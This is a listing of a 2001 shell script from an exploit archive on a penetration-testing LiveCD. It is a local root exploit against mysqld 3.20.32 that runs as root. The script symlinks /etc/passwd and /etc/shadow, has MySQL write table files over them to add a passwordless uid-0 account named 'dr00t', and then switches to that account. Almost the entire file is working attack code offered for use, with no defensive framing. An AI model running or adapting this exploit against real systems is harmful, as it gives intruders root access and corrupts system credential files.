home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / database / mysql / mysql.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  2.3 KB  |  77 lines
  1. #!/bin/sh
  2. # this is lame sploit for a 0:0 mysqld proces only 
  3. # =) fshystko 4 m.sz
  4. clear
  5. echo '._____________________________________________________________.'
  6. echo '|       amfetamina i.n.c        &            speed i.n.c"     |'
  7. echo '|-------------------------------------------------------------|'
  8. echo '|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|'
  9. echo '|                           presents                          |'
  10. echo '|-------------------------------------------------------------|'
  11. echo '|                     amorphis akka spidi                     |'
  12. echo '|                        MySQL  xsploit                       |'
  13. echo '|                  special for mysql-3.20.32                  |'
  14. echo '|            but other versions so also vulnerabile           |'
  15. echo '|                        maybe broken                         |'
  16. echo '._____________________________________________________________.'
  17. echo "please wait : "
  18. echo -n 'trying ...  :'
  19. if [ -x /usr/bin/mysql ]; then
  20. echo -n '.'
  21. else 
  22. echo ' Err '
  23. exit 1
  24. fi
  25. #to w sumie zupelnie nie potrzebne %) ale co tam 
  26. cat >/var/tmp/mysql.c<<__eof__
  27. main()
  28. {
  29. system("ln -s /etc/passwd /var/tmp/gotcha.ISD");
  30. system("ln -s /etc/shadow /var/tmp/kreska.ISD");
  31. }
  32. __eof__
  33. sleep 1 
  34. echo -n  '.'
  35. cc /var/tmp/mysql.c -o /var/tmp/linkuj
  36. sleep 1 
  37. echo -n 'o'
  38.  
  39. if [ -f /var/tmp/linkuj ]; then
  40.    echo -n 'oOOoo..'
  41.     chmod +x /var/tmp/linkuj
  42. /var/tmp/linkuj
  43.   else 
  44.   echo ' !Err!'
  45. exit 1
  46. fi
  47. echo ":  part one wporzo "
  48. echo 
  49. echo
  50. echo "Teras podaj :"
  51. echo -n 'mysql login :'
  52. read $login
  53. echo -n 'mysql password :'
  54. read $pass
  55. echo -n 'mysql hostname :'
  56. read $host
  57. cat >/var/tmp/sploit<<__eof__
  58. create table gotcha(qqq varchar(255));
  59. create table kreska(qqq varchar(255));
  60. insert into gotcha values('\ndr00t::0:0:narkoman:/:/bin/sh\n');
  61. insert into kreska values('\ndr00t::1:0:99999:7:-1:-1:\n');
  62. __eof__
  63. echo "Wait .. "
  64. sleep 1
  65. cd /tmp
  66. cat /var/tmp/sploit |mysql -u $login -h $host -p $pass '../../tmp'
  67. sleep 3
  68. echo "..ooOO#"
  69. rm /var/tmp/sploit
  70. rm /var/tmp/mysql.c /var/tmp/linkuj /var/tmp/gotcha.ISD /var/tmp/kreska.ISD
  71. if [ 'cat /etc/passwd |grep dr00t' = 'dr00t::0:0:narkoman:/:/bin/sh' ];then
  72. echo ' ok i have a root :>>>>> '
  73. su - dr00t
  74. else 
  75. echo 'ch00y cos musiales zjebac '
  76. fi
  77. #                 www.hack.co.za           [09 April 2001]